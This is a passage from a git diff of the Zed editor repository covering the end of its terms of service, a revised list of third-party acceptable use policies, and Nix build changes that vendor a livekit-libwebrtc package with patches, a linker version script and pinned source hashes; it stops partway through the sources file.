Customer’s headquarters unless both parties agree otherwise; and appearances may be made via telephonic or video hearing; and (b) for any claim or counterclaim under $25,000, by solely the submission of documents to the arbitrator. + +### 15.3. Waiver of Jury Trial and Class Action Waiver + +EACH PARTY HEREBY IRREVOCABLY WAIVES ALL RIGHT TO TRIAL BY JURY IN ANY ACTION, SUIT, PROCEEDING, CLAIM, OR COUNTERCLAIM ARISING OUT OF OR RELATING TO THESE TERMS. 
CUSTOMER AND ZED EACH AGREE THAT ANY SUIT, PROCEEDING, OR OTHER ACTION ARISING OUT OF OR RELATED TO THESE TERMS WILL BE CONDUCTED ONLY ON AN INDIVIDUAL BASIS AND NOT IN A CLASS, CONSOLIDATED OR REPRESENTATIVE ACTION. + +## 16. General Terms + +### 16.1. + +These Terms, including the Privacy Policy and any other agreements expressly incorporated by reference into these Terms, are the entire and exclusive understanding and agreement between Customer and Zed regarding your use of the Service. Customer may not assign or transfer these Terms or its rights under these Terms, in whole or in part, by operation of law or otherwise, without Zed’s prior written consent. Zed may assign these Terms and all rights granted under these Terms at any time without notice or consent. The failure to require performance of any provision will not affect Zed’s right to require performance at any other time after that, nor will a waiver by Zed of any breach or default of these Terms, or any provision of these Terms, be a waiver of any subsequent breach or default or a waiver of the provision itself. Use of Section headers in these Terms are for convenience only and will not have any impact on the interpretation of any provision. Throughout these Terms the use of the word “including” means “including but not limited to.” If any part of these Terms are held to be invalid or unenforceable, then the unenforceable part will be given effect to the greatest extent possible, and the remaining parts will remain in full force and effect. + +### 16.2. Notices + +Except as set out in the Terms, any notice or consent under the Terms must be in writing to the Customer email address on the Order and Customer shall send all notices to Zed at Zed Industries, Inc., 2590 Welton Street, Suite 200, PMB 1916, Denver, CO 80205 with cc: to [legal@zed.dev](mailto:legal@zed.dev) and will be deemed given: (a) upon receipt if by personal delivery; (b) upon receipt if by certified or registered U.S. 
mail (return receipt requested); or (c) one day after dispatch if by a commercial overnight delivery service. Either Party may update its address with notice to the other Party pursuant to this Section. Zed may also send operational notices to Customer by email or through the Service. + +### 16.3. DPA + +The terms of the Data Processing Agreement (“**DPA**”), available upon request, are incorporated into these Terms by reference. + +### 16.4. Modification of Terms + +Zed may, from time to time, change these Terms. Please check these Terms periodically for changes. Revisions will be effective immediately except that, for existing users, material revisions will be effective 30 days after posting or notice to Customer of the revisions unless otherwise stated. Zed may require that Customer accept modified Terms in order to continue to use the Service. If Customer does not agree to the modified Terms, then Customer should discontinue its use of the Service and notify Zed at hi@zed.dev, in which case Zed will provide a pro-rated refund of any prepaid Subscription Fee. The terms in any Customer purchase order or business form will not amend or modify the Terms and are expressly rejected by Zed; any of these Customer documents are for administrative purposes only and have no legal effect with respect to the Terms. + +### 16.5. Subcontractors + +Zed may use subcontractors and permit them to exercise Zed’s rights, but Zed remains responsible for their compliance with the Terms and for its overall performance under the Terms. + +### 16.6. Independent Contractors + +The Parties are independent contractors, not agents, partners, or joint venturers. + +### 16.7. Export + +Customer will comply with all relevant U.S. and foreign export and import Laws in using the Service. Customer: (a) represents and warrants that it is not listed on any U.S. government list of prohibited or restricted parties or located in (or a national of) a country that is subject to a U.S. 
government embargo or that has been designated by the U.S. government as a “terrorist supporting” country; (b) agrees not to access or use the Service in violation of any U.S. export embargo, prohibition, or restriction; and (c) will not submit to the Service any information controlled under the U.S. International Traffic in Arms Regulations. + +### 16.8. Government End-Users + +Elements of the Service may include commercial computer software. If the user or licensee of the Service is an agency, department, or other entity of the United States Government, the use, duplication, reproduction, release, modification, disclosure, or transfer of the Service or any related documentation of any kind, including technical data and manuals, is restricted by the terms of the Terms in accordance with Federal Acquisition Regulation 12.212 for civilian purposes and Defense Federal Acquisition Regulation Supplement 227.7202 for military purposes. The Service was developed fully at private expense. All other use is prohibited. + +### 16.9. Privacy Policy + +Please read the [Zed Privacy Policy](/privacy-policy) (the “**Privacy Policy**”) carefully for information relating to our collection, use, storage, and disclosure of your personal information. The Zed Privacy Policy is incorporated by this reference into, and made a part of, these Terms. + +### 16.10. Additional Terms + +Customer’s use of the Service is subject to all additional terms, policies, rules, or guidelines applicable to the Service or certain features of the Service that we may post on or link to from the Service (the “**Additional Terms**”). All Additional Terms are incorporated by this reference into, and made a part of, these Terms. + +### 16.11. Consent to Electronic Communications + +By using the Service, Customer consents to receiving certain electronic communications from Zed as further described in the Privacy Policy. Please read the Privacy Policy to learn more about Zed’s electronic communications practices. 
Customer agrees that any notices, agreements, disclosures, or other communications that Zed sends to Customer electronically will satisfy any legal communication requirements, including that those communications be in writing. Zed may send Customer emails concerning Zed products and services, as well as those of third parties. Customer may opt out of promotional emails by following the unsubscribe instructions in the promotional email itself. + +### 16.12. Contact Information + +The Service is offered by Zed Industries, Inc. Customer may contact Zed by sending correspondence to 2590 Welton Street, Suite 200, PMB 1916, Denver, CO 80205 with cc: to [legal@zed.dev](mailto:legal@zed.dev). + +### 16.13. Notice to California Residents + +If Customer is a California resident, then under California Civil Code Section 1789.3, Customer may contact the Complaint Assistance Unit of the Division of Consumer Services of the California Department of Consumer Affairs in writing at 1625 N. Market Blvd., Suite N 112, Sacramento, California 95834, or by telephone at +1-800-952-5210 in order to resolve a complaint regarding the Service or to receive further information regarding use of the Service. diff --git a/legal/third-party-terms.md b/legal/third-party-terms.md index 4c4a0f6cce319369283c42d68f150699f9c1565c..6d4153d0b4771a5ccb9cca924caae682eece145c 100644 --- a/legal/third-party-terms.md +++ b/legal/third-party-terms.md @@ -1,53 +1,39 @@ --- -title: 3rd Party Terms -slug: third-party-terms +title: Acceptable Use Policies +slug: acceptable-use-policies --- -In addition to the [Zed End User Terms](/terms) and [Zed Privacy Policy](/privacy-policy) usage of certain Zed features may also subject you to additional 3rd party terms and conditions. 
These terms and conditions may include, but are not limited to, the following: +**Last Updated:** March 2, 2026 -## Anthropic - -- [Anthropic Usage Policy](https://www.anthropic.com/legal/aup) -- [Anthropic Privacy Policy](https://www.anthropic.com/legal/privacy) -- [Anthropic Commercial Terms of Service](https://www.anthropic.com/legal/commercial-terms) +Some third-party services accessible through Zed have their own acceptable use policies. These apply whether Zed hosts the service on your behalf or you connect your own account. The applicable policies are listed below and apply alongside the [Zed End User Terms](/terms) and [Zed Privacy Policy](/privacy-policy). -## Baseten +These policies may be updated from time to time by the applicable provider. -- [BaseTen Terms and Conditions](https://www.baseten.co/terms-and-conditions/) - -### Exa.ai +## Anthropic -- [Exa Labs Terms and Conditions](https://exa.ai/assets/Exa_Labs_Terms_of_Service.pdf) -- [Exa Labs Privacy Policy](https://exa.ai/privacy-policy) +- [Anthropic Usage Policy](https://www.anthropic.com/legal/aup) ## GitHub -- [GitHub Terms of Service](https://docs.github.com/en/site-policy/github-terms/github-terms-of-service) -- [GitHub Privacy Statement](https://docs.github.com/en/site-policy/privacy-policies/github-general-privacy-statement) - [GitHub Acceptable Use Policies](https://docs.github.com/en/site-policy/acceptable-use-policies/github-acceptable-use-policies) - [GitHub Copilot Product Specific Terms](https://github.com/customer-terms/github-copilot-product-specific-terms) ## Google -- [Google APIs Terms of Service](https://developers.google.com/terms) -- [Google Gemini API Additional Terms of Service](https://ai.google.dev/gemini-api/terms) - [Google Generative AI Prohibited Use Policy](https://policies.google.com/terms/generative-ai/use-policy) -## LiveKit +## OpenAI + +- [OpenAI Usage Policies](https://openai.com/policies/usage-policies/) -- [LiveKit Terms of 
Service](https://livekit.io/legal/terms-of-service) -- [LiveKit Privacy Policy](https://livekit.io/legal/privacy-policy) +## OpenRouter -## OpenAI +- [OpenRouter Terms of Service](https://openrouter.ai/terms) -- [OpenAI Terms of Use](https://openai.com/policies/terms-of-use/) -- [OpenAI Privacy Policy](https://openai.com/policies/privacy-policy/) -- [OpenAI Business terms](https://openai.com/policies/business-terms/) -- [OpenAI Service terms](https://openai.com/policies/service-terms/) +## Vercel -## SuperMaven +- [Vercel Acceptable Use Policy](https://vercel.com/legal/acceptable-use-policy) -- [SuperMaven Terms of Service](https://supermaven.com/terms-of-service) -- [SuperMaven Privacy Policy](https://supermaven.com/privacy-policy) +## xAI -**DATE: May 6, 2025** +- [xAI Acceptable Use Policy](https://x.ai/legal/acceptable-use-policy) diff --git a/nix/build.nix b/nix/build.nix index 28031337da6877cebda056e9cf2eab0f8f0d3ff7..2f283f83a4d8b215d12933178f1e9b3b33617067 100644 --- a/nix/build.nix +++ b/nix/build.nix @@ -1,4 +1,6 @@ { + pkgs, + system, lib, stdenv, @@ -24,10 +26,20 @@ fontconfig, freetype, git, + glib, + libdrm, + libgbm, libgit2, libglvnd, + libva, + libxcomposite, + libxdamage, + libxext, + libxfixes, libxkbcommon, - livekit-libwebrtc, + libxrandr, + libx11, + libxcb, nodejs_22, openssl, perl, @@ -42,6 +54,7 @@ withGLES ? false, profile ? "release", + commitSha ? 
null, }: assert withGLES -> stdenv.hostPlatform.isLinux; let @@ -74,7 +87,10 @@ let in rec { pname = "zed-editor"; - version = zedCargoLock.package.version + "-nightly"; + version = + zedCargoLock.package.version + + "-nightly" + + lib.optionalString (commitSha != null) "+${builtins.substring 0 7 commitSha}"; src = builtins.path { path = ../.; filter = mkIncludeFilter ../.; @@ -161,11 +177,22 @@ let ] ++ lib.optionals stdenv'.hostPlatform.isLinux [ alsa-lib + glib + libva libxkbcommon wayland gpu-lib - xorg.libX11 - xorg.libxcb + libglvnd + libx11 + libxcb + libdrm + libgbm + libva + libxcomposite + libxdamage + libxext + libxfixes + libxrandr ] ++ lib.optionals stdenv'.hostPlatform.isDarwin [ apple-sdk_15 @@ -200,7 +227,8 @@ let }; ZED_UPDATE_EXPLANATION = "Zed has been installed using Nix. Auto-updates have thus been disabled."; RELEASE_VERSION = version; - LK_CUSTOM_WEBRTC = livekit-libwebrtc; + ZED_COMMIT_SHA = lib.optionalString (commitSha != null) "${commitSha}"; + LK_CUSTOM_WEBRTC = pkgs.callPackage ./livekit-libwebrtc/package.nix { }; PROTOC = "${protobuf}/bin/protoc"; CARGO_PROFILE = profile; @@ -213,6 +241,7 @@ let lib.makeLibraryPath [ gpu-lib wayland + libva ] }"; @@ -244,6 +273,16 @@ let postPatch = '' substituteInPlace webrtc-sys/build.rs --replace-fail \ "cargo:rustc-link-lib=static=webrtc" "cargo:rustc-link-lib=dylib=webrtc" + + substituteInPlace webrtc-sys/build.rs --replace-fail \ + 'add_gio_headers(&mut builder);' \ + 'for lib_name in ["glib-2.0", "gio-2.0"] { + if let Ok(lib) = pkg_config::Config::new().cargo_metadata(false).probe(lib_name) { + for path in lib.include_paths { + builder.include(&path); + } + } + }' '' + lib.optionalString withGLES '' cat ${glesConfig} >> .cargo/config/config.toml diff --git a/nix/livekit-libwebrtc/0001-shared-libraries.patch b/nix/livekit-libwebrtc/0001-shared-libraries.patch new file mode 100644 index 0000000000000000000000000000000000000000..2a7fcf0cbdd519d51d9df446d5b9db00b22d521e --- /dev/null +++ 
b/nix/livekit-libwebrtc/0001-shared-libraries.patch @@ -0,0 +1,17 @@ +--- a/BUILD.gn ++++ b/BUILD.gn +@@ -143,8 +143,12 @@ + # target_defaults and direct_dependent_settings. + config("common_inherited_config") { + defines = [ "PROTOBUF_ENABLE_DEBUG_LOGGING_MAY_LEAK_PII=0" ] +- cflags = [] +- ldflags = [] ++ cflags = [ "-fvisibility=default" ] ++ ldflags = [ "-lavutil", "-lavformat", "-lavcodec" ] ++ ++ if (is_linux) { ++ ldflags += [ "-Wl,--version-script=" + rebase_path("//libwebrtc.version", root_build_dir) ] ++ } + + if (rtc_objc_prefix != "") { + defines += [ "RTC_OBJC_TYPE_PREFIX=${rtc_objc_prefix}" ] diff --git a/nix/livekit-libwebrtc/README.md b/nix/livekit-libwebrtc/README.md new file mode 100644 index 0000000000000000000000000000000000000000..87d4fc5599fa0a3b50f853ad53f19e90c5c2121e --- /dev/null +++ b/nix/livekit-libwebrtc/README.md @@ -0,0 +1,7 @@ +# Vendored livekit-libwebrtc build + +The contents of this directory is vendored from [this nixpkgs +PR](https://github.com/NixOS/nixpkgs/pull/478907). + +It should be removed as soon as said PR is merged and the new version of libwebrtc hits +nixpkgs-unstable. diff --git a/nix/livekit-libwebrtc/chromium-129-rust.patch b/nix/livekit-libwebrtc/chromium-129-rust.patch new file mode 100644 index 0000000000000000000000000000000000000000..1fe0c7f87324d8a046ae5226ccfbb06aa42d30b1 --- /dev/null +++ b/nix/livekit-libwebrtc/chromium-129-rust.patch @@ -0,0 +1,21 @@ +diff --git a/build/config/compiler/BUILD.gn b/build/config/compiler/BUILD.gn +index 45086d6838cac..81132ad8ecb31 100644 +--- a/build/config/compiler/BUILD.gn ++++ b/build/config/compiler/BUILD.gn +@@ -1727,16 +1727,6 @@ config("runtime_library") { + configs += [ "//build/config/c++:runtime_library" ] + } + +- # Rust and C++ both provide intrinsics for LLVM to call for math operations. We +- # want to use the C++ intrinsics, not the ones in the Rust compiler_builtins +- # library. 
The Rust symbols are marked as weak, so that they can be replaced by +- # the C++ symbols. This config ensures the C++ symbols exist and are strong in +- # order to cause that replacement to occur by explicitly linking in clang's +- # compiler-rt library. +- if (is_clang && !is_nacl && !is_cronet_build) { +- configs += [ "//build/config/clang:compiler_builtins" ] +- } +- + # TODO(crbug.com/40570904): Come up with a better name for is POSIX + Fuchsia + # configuration. + if (is_posix || is_fuchsia) { diff --git a/nix/livekit-libwebrtc/libwebrtc.version b/nix/livekit-libwebrtc/libwebrtc.version new file mode 100644 index 0000000000000000000000000000000000000000..abf9d5b9df61640d4775e2e1aeea6f113954a944 --- /dev/null +++ b/nix/livekit-libwebrtc/libwebrtc.version @@ -0,0 +1,22 @@ +/* Linker version script for libwebrtc.so (Linux only). + * + * When libwebrtc.so is built with rtc_use_pipewire=true and + * -fvisibility=default, PipeWire lazy-load trampoline stubs (pw_*, spa_*) + * are exported as weak symbols. If the PipeWire ALSA plugin + * (libasound_module_pcm_pipewire.so) is later dlopen'd by libasound, + * the dynamic linker may resolve the plugin's pw_* references through + * libwebrtc.so's broken trampolines instead of the real libpipewire.so, + * causing a SIGSEGV (NULL function pointer dereference). + * + * This script hides only those third-party symbol namespaces while + * keeping every WebRTC / BoringSSL / internal symbol exported (which + * the Rust webrtc-sys bindings require). 
+ */ +{ + global: + *; + + local: + pw_*; + spa_*; +}; diff --git a/nix/livekit-libwebrtc/mkSystemLibraries.nix b/nix/livekit-libwebrtc/mkSystemLibraries.nix new file mode 100644 index 0000000000000000000000000000000000000000..4293798faf9031ddc80f6c2a9e70a34b6fd56d62 --- /dev/null +++ b/nix/livekit-libwebrtc/mkSystemLibraries.nix @@ -0,0 +1,64 @@ +{ + brotli, + fontconfig, + freetype, + harfbuzz, + icu, + jsoncpp, + libpng, + libwebp, + libxml2, + libxslt, + minizip, + ffmpeg_6, +}: +{ + "brotli" = { + package = brotli; + path = "third_party/brotli/BUILD.gn"; + }; + "fontconfig" = { + package = fontconfig; + path = "third_party/fontconfig/BUILD.gn"; + }; + "freetype" = { + package = freetype; + path = "build/config/freetype/freetype.gni"; + }; + "harfbuzz-ng" = { + package = harfbuzz; + path = "third_party/harfbuzz-ng/harfbuzz.gni"; + }; + "jsoncpp" = { + package = jsoncpp; + path = "third_party/jsoncpp/BUILD.gn"; + }; + "icu" = { + package = icu; + path = "third_party/icu/BUILD.gn"; + }; + "libpng" = { + package = libpng; + path = "third_party/libpng/BUILD.gn"; + }; + "libwebp" = { + package = libwebp; + path = "third_party/libwebp/BUILD.gn"; + }; + "libxml" = { + package = libxml2; + path = "third_party/libxml/BUILD.gn"; + }; + "libxslt" = { + package = libxslt; + path = "third_party/libxslt/BUILD.gn"; + }; + "zlib" = { + package = minizip; + path = "third_party/zlib/BUILD.gn"; + }; + "ffmpeg" = { + package = ffmpeg_6; + path = "third_party/ffmpeg/BUILD.gn"; + }; +} diff --git a/nix/livekit-libwebrtc/package.nix b/nix/livekit-libwebrtc/package.nix new file mode 100644 index 0000000000000000000000000000000000000000..2a07f5c2170e2db00eb1547b2b820e015f8683ff --- /dev/null +++ b/nix/livekit-libwebrtc/package.nix @@ -0,0 +1,353 @@ +{ + stdenv, + clang, + gclient2nix, + lib, + gn, + fetchurl, + fetchpatch, + xcbuild, + python3, + ninja, + git, + cpio, + pkg-config, + glib, + alsa-lib, + pulseaudio, + nasm, + brotli, + fontconfig, + freetype, + harfbuzz, + icu, + 
jsoncpp, + libpng, + libwebp, + libxml2, + libxslt, + minizip, + ffmpeg_6, + libepoxy, + libgbm, + libGL, + libxcomposite, + libxdamage, + libxext, + libxfixes, + libxrandr, + libxtst, + libx11, + libxi, + pipewire, + xorg, +}: +let + platformMap = { + "x86_64" = "x64"; + "i686" = "x86"; + "arm" = "arm"; + "aarch64" = "arm64"; + }; + cpuName = stdenv.hostPlatform.parsed.cpu.name; + gnArch = platformMap."${cpuName}" or (throw "unsupported arch ${cpuName}"); + gnOs = + if stdenv.hostPlatform.isLinux then + "linux" + else if stdenv.hostPlatform.isDarwin then + "mac" + else + throw "unknown platform ${stdenv.hostPlatform.config}"; + boringSslSymbols = fetchurl { + url = "https://raw.githubusercontent.com/livekit/rust-sdks/refs/tags/webrtc-dac8015-6/webrtc-sys/libwebrtc/boringssl_prefix_symbols.txt"; + hash = "sha256-dAweArv8zjsFPENEKi9mNBQkt4y+hh3rCqG6QZjRC20="; + }; + gnSystemLibraries = import ./mkSystemLibraries.nix { + inherit + brotli + fontconfig + freetype + harfbuzz + icu + jsoncpp + libpng + libwebp + libxml2 + libxslt + minizip + ffmpeg_6 + ; + }; +in +stdenv.mkDerivation { + pname = "livekit-libwebrtc"; + version = "137-unstable-2025-11-24"; + + # libwebrtc loads libEGL/libGL at runtime via dlopen() in the Wayland + # screencast path, so they are not visible as ordinary DT_NEEDED edges. + # Keep an explicit rpath so the shared object can resolve them at runtime. + NIX_LDFLAGS = lib.optionalString stdenv.hostPlatform.isLinux + "-rpath ${lib.makeLibraryPath [ libGL ]}"; + + # Prevent fixup from stripping the rpath above as "unused". 
+ dontPatchELF = stdenv.hostPlatform.isLinux; + + gclientDeps = gclient2nix.importGclientDeps ./sources.json; + sourceRoot = "src"; + + patches = [ + # Adds missing dependencies to generated LICENSE + (fetchpatch { + url = "https://raw.githubusercontent.com/livekit/rust-sdks/a4343fe9d88fcc96f8e88959c90d509abbd0307b/webrtc-sys/libwebrtc/patches/add_licenses.patch"; + hash = "sha256-9A4KyRW1K3eoQxsTbPX0vOnj66TCs2Fxjpsu5wO8mGI="; + }) + # Fixes the certificate chain, required for Let's Encrypt certs + (fetchpatch { + url = "https://raw.githubusercontent.com/livekit/rust-sdks/a4343fe9d88fcc96f8e88959c90d509abbd0307b/webrtc-sys/libwebrtc/patches/ssl_verify_callback_with_native_handle.patch"; + hash = "sha256-RBvRcJzoKItpEbqpe07YZe1D1ZVGS12EnDSISldGy+0="; + }) + # Adds dependencies and features required by livekit + (fetchpatch { + url = "https://raw.githubusercontent.com/livekit/rust-sdks/a4343fe9d88fcc96f8e88959c90d509abbd0307b/webrtc-sys/libwebrtc/patches/add_deps.patch"; + hash = "sha256-DwRtGdU5sppmiFsVuyhJoVCQrRl5JFmZJfxgUPhYXBg="; + }) + # Fix gcc-related errors + (fetchpatch { + url = "https://raw.githubusercontent.com/livekit/rust-sdks/a4343fe9d88fcc96f8e88959c90d509abbd0307b/webrtc-sys/libwebrtc/patches/force_gcc.patch"; + hash = "sha256-1d73Pi1HkbunjYvp1NskUNE4xXbCmnh++rC6NrCJHbY="; + stripLen = 1; + extraPrefix = "build/"; + }) + # fix a gcc-related dav1d compile option + (fetchpatch { + url = "https://raw.githubusercontent.com/livekit/rust-sdks/a4343fe9d88fcc96f8e88959c90d509abbd0307b/webrtc-sys/libwebrtc/patches/david_disable_gun_source_macro.patch"; + hash = "sha256-RCZpeeSQHaxkL3dY2oFFXDjYeU0KHw7idQFONGge8+0="; + stripLen = 1; + extraPrefix = "third_party/"; + }) + # Required for dynamically linking to ffmpeg libraries, exposing symbols, + # and hiding PipeWire symbols via version script (Linux only) to prevent + # SIGSEGV when ALSA's PipeWire plugin is loaded. 
+ ./0001-shared-libraries.patch + # Borrow a patch from chromium to prevent a build failure due to missing libclang libraries + ./chromium-129-rust.patch + ]; + + postPatch = '' + substituteInPlace .gn \ + --replace-fail "vpython3" "python3" + + substituteInPlace tools/generate_shim_headers/generate_shim_headers.py \ + --replace-fail "OFFICIAL_BUILD" "GOOGLE_CHROME_BUILD" + + substituteInPlace BUILD.gn \ + --replace-fail "rtc_static_library" "rtc_shared_library" \ + --replace-fail "complete_static_lib = true" "" + + substituteInPlace webrtc.gni \ + --replace-fail "!build_with_chromium && is_component_build" "false" + + substituteInPlace rtc_tools/BUILD.gn \ + --replace-fail "\":frame_analyzer\"," "" + + for lib in ${toString (builtins.attrNames gnSystemLibraries)}; do + if [ -d "third_party/$lib" ]; then + find "third_party/$lib" -type f \ + \! -path "third_party/$lib/chromium/*" \ + \! -path "third_party/$lib/google/*" \ + \! -path "third_party/harfbuzz-ng/utils/hb_scoped.h" \ + \! -regex '.*\.\(gn\|gni\|isolate\)' \ + \! -name 'LICENSE*' \ + \! -name 'COPYING*' \ + -delete + fi + done + + # Trick the update_rust.py script into thinking we have *this specific* rust available. + # It isn't actually needed for the libwebrtc build, but GN will fail if it isn't there. 
+ mkdir -p third_party/rust-toolchain + (python3 tools/rust/update_rust.py --print-package-version || true) \ + | head -n 1 \ + | sed 's/.* expected Rust version is \([^ ]*\) .*/rustc 1.0 1234 (\1 chromium)/' \ + > third_party/rust-toolchain/VERSION + '' + + lib.optionalString stdenv.hostPlatform.isLinux '' + mkdir -p buildtools/linux64 + ln -sf ${lib.getExe gn} buildtools/linux64/gn + cp ${./libwebrtc.version} libwebrtc.version + substituteInPlace build/toolchain/linux/BUILD.gn \ + --replace 'toolprefix = "aarch64-linux-gnu-"' 'toolprefix = ""' + '' + + lib.optionalString stdenv.hostPlatform.isDarwin '' + mkdir -p buildtools/mac + ln -sf ${lib.getExe gn} buildtools/mac/gn + chmod +x build/toolchain/apple/linker_driver.py + patchShebangs build/toolchain/apple/linker_driver.py + substituteInPlace build/toolchain/apple/toolchain.gni --replace-fail "/bin/cp -Rc" "cp -a" + ''; + + outputs = [ + "dev" + "out" + ]; + + nativeBuildInputs = + (builtins.concatLists ( + lib.mapAttrsToList ( + _: library: if (library.package ? 
dev) then [ library.package.dev ] else [ ] + ) gnSystemLibraries + )) + ++ [ + gclient2nix.gclientUnpackHook + gn + (python3.withPackages (ps: [ ps.setuptools ])) + ninja + git + cpio + pkg-config + ] + ++ lib.optionals stdenv.hostPlatform.isDarwin [ xcbuild ]; + + buildInputs = [ + nasm + ] + ++ (lib.mapAttrsToList (_: library: library.package) gnSystemLibraries) + ++ (lib.optionals stdenv.hostPlatform.isLinux [ + glib + alsa-lib + pulseaudio + libepoxy + libgbm + libGL + libxcomposite + libxdamage + libxext + libxfixes + libxrandr + libxtst + pipewire + libx11 + libxi + ]); + + preConfigure = '' + echo "generate_location_tags = true" >> build/config/gclient_args.gni + echo "0" > build/util/LASTCHANGE.committime + + python build/linux/unbundle/replace_gn_files.py \ + --system-libraries ${toString (builtins.attrNames gnSystemLibraries)} + ''; + + gnFlags = [ + "is_debug=false" + "rtc_include_tests=false" + ''target_os="${gnOs}"'' + ''target_cpu="${gnArch}"'' + "treat_warnings_as_errors=false" + "rtc_enable_protobuf=false" + "rtc_include_tests=false" + "rtc_build_examples=false" + "rtc_build_tools=false" + "rtc_libvpx_build_vp9=true" + "enable_libaom=true" + "use_dummy_lastchange=true" + "is_component_build=true" + "enable_stripping=true" + "rtc_use_h264=true" + "rtc_use_h265=true" + "use_custom_libcxx=false" + "use_rtti=true" + ] + ++ (lib.optionals stdenv.hostPlatform.isLinux [ + "rtc_use_pipewire=true" + "symbol_level=0" + "enable_iterator_debugging=false" + "rtc_use_x11=true" + "use_sysroot=false" + "use_custom_libcxx_for_host=false" + "use_libcxx_modules=false" + "use_llvm_libatomic=false" + "is_clang=false" + ]) + ++ (lib.optionals stdenv.hostPlatform.isDarwin [ + ''mac_deployment_target="${stdenv.hostPlatform.darwinMinVersion}"'' + "rtc_enable_symbol_export=true" + "rtc_enable_objc_symbol_export=true" + "rtc_include_dav1d_in_internal_decoder_factory=true" + "clang_use_chrome_plugins=false" + "use_lld=false" + ''clang_base_path="${clang}"'' + ]); + + 
ninjaFlags = [ + ":default" + ] + ++ lib.optionals stdenv.hostPlatform.isDarwin [ + "api/audio_codecs:builtin_audio_decoder_factory" + "api/task_queue:default_task_queue_factory" + "sdk:native_api" + "sdk:default_codec_factory_objc" + "pc:peer_connection" + "sdk:videocapture_objc" + "sdk:mac_framework_objc" + "desktop_capture_objc" + ]; + + postBuild = + lib.optionalString stdenv.hostPlatform.isLinux '' + objcopy --redefine-syms="${boringSslSymbols}" "libwebrtc.so" + '' + + '' + # Generate licenses + python3 "../../tools_webrtc/libs/generate_licenses.py" \ + --target ${if stdenv.hostPlatform.isDarwin then ":webrtc" else ":default"} $PWD $PWD + ''; + + installPhase = '' + runHook preInstall + + mkdir -p $out/lib + mkdir -p $dev/include + + install -m0644 obj/webrtc.ninja obj/modules/desktop_capture/desktop_capture.ninja args.gn LICENSE.md $dev + + pushd ../.. + find . -name "*.h" -print | cpio -pd $dev/include + find . -name "*.inc" -print | cpio -pd $dev/include + popd + '' + + lib.optionalString stdenv.hostPlatform.isLinux '' + install -m0644 libwebrtc.so libthird_party_boringssl.so $out/lib + '' + + lib.optionalString stdenv.hostPlatform.isDarwin '' + install -m0644 WebRTC.framework/Versions/A/WebRTC $out/lib/libwebrtc.dylib + install -m0644 libthird_party_boringssl.dylib $out/lib + '' + + '' + ln -s $out/lib $dev/lib + + runHook postInstall + ''; + + postFixup = lib.optionalString stdenv.hostPlatform.isDarwin '' + boringssl="$out/lib/libthird_party_boringssl.dylib" + webrtc="$out/lib/libwebrtc.dylib" + + install_name_tool -id "$boringssl" "$boringssl" + install_name_tool -id "$webrtc" "$webrtc" + install_name_tool -change @rpath/libthird_party_boringssl.dylib "$boringssl" "$webrtc" + ''; + + passthru.updateScript = ./update.sh; + + meta = { + description = "WebRTC library used by livekit"; + homepage = "https://github.com/livekit/rust-sdks/"; + license = lib.licenses.bsd3; + maintainers = with lib.maintainers; [ + WeetHet + niklaskorz + ]; + platforms = 
lib.platforms.linux ++ lib.platforms.darwin; + }; +} diff --git a/nix/livekit-libwebrtc/sources.json b/nix/livekit-libwebrtc/sources.json new file mode 100644 index 0000000000000000000000000000000000000000..2db785a840f1db0e86a255c5d8c540f5c566ac59 --- /dev/null +++ b/nix/livekit-libwebrtc/sources.json @@ -0,0 +1,372 @@ +{ + "src": { + "args": { + "hash": "sha256-+PgmOZD2Fi+SC66nguixhSwDsoXi4Sz693qOZZrLXm8=", + "owner": "webrtc-sdk", + "repo": "webrtc", + "rev": "624fa1dce239af785fc5fa9ca3b21b9250d3f835" + }, + "fetcher": "fetchFromGitHub" + }, + "src/base": { + "args": { + "hash": "sha256-MTG+pjMPY6/dqeEUy+xJVxPuICETtV98S+h/lFwGItg=", + "rev": "86c814633cf284bc8057a539bc722e2a672afe2f", + "url": "https://chromium.googlesource.com/chromium/src/base" + }, + "fetcher": "fetchFromGitiles" + }, + "src/build": { + "args": { + "hash": "sha256-qFZ12YFX4qxFEHU+VWOG+HDYYPXodgGz+iJ7WEc7cD8=", + "owner": "webrtc-sdk", + "repo": "build", + "rev": "01021e6c12636951a6b4e5342e16b2101b352367" + }, + "fetcher": "fetchFromGitHub" + }, + "src/buildtools": { + "args": { + "hash": "sha256-YWtmMKL1ydueNJ4XM/Pq+8OpqIFe5A6/vYyfZTv7/EI=", + "rev": "0f32cb9025766951122d4ed19aba87a94ded3f43", + "url": "https://chromium.googlesource.com/chromium/src/buildtools" + }, + "fetcher": "fetchFromGitiles" + }, + "src/testing": { + "args": { + "hash": "sha256-s65cABkyMo+FkAmilS67qM3VnrT7iYZg9scycrXzxyE=", + "rev": "a89c37d36bf80c05963727e28b9916835ae88d3a", + "url": "https://chromium.googlesource.com/chromium/src/testing" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party": { + "args": { + "hash": "sha256-q+xVOFlpC0vnLMSF9Z6ZRL7mb/cu8jBpsWjDNFFgiKM=", + "rev": "8062e0e102496ff14a8c58b586f014527424953d", + "url": "https://chromium.googlesource.com/chromium/src/third_party" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/boringssl/src": { + "args": { + "hash": "sha256-5Efqc8pLs4ZskXQGpFdTb5cw//v3+DR285m/DsrWSWA=", + "rev": "34492c89a8e381e0e856a686cc71b1eb5bd728db", + "url": 
"https://boringssl.googlesource.com/boringssl.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/breakpad/breakpad": { + "args": { + "hash": "sha256-0ynZuxIqBIpNkfD3Y9XdPFQr7HeQcsUO3lhnqvH+k8c=", + "rev": "232a723f5096ab02d53d87931efa485fa77d3b03", + "url": "https://chromium.googlesource.com/breakpad/breakpad.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/catapult": { + "args": { + "hash": "sha256-FIJZE1Qu1MLZA4qxB68k1NjhgSbFTjf57YF85JicVZw=", + "rev": "000f47cfa393d7f9557025a252862e2a61a60d44", + "url": "https://chromium.googlesource.com/catapult.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/ced/src": { + "args": { + "hash": "sha256-ySG74Rj2i2c/PltEgHVEDq+N8yd9gZmxNktc56zIUiY=", + "rev": "ba412eaaacd3186085babcd901679a48863c7dd5", + "url": "https://chromium.googlesource.com/external/github.com/google/compact_enc_det.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/clang-format/script": { + "args": { + "hash": "sha256-d9uweklBffiuCWEb03ti1eFLnMac2qRtvggzXY1n/RU=", + "rev": 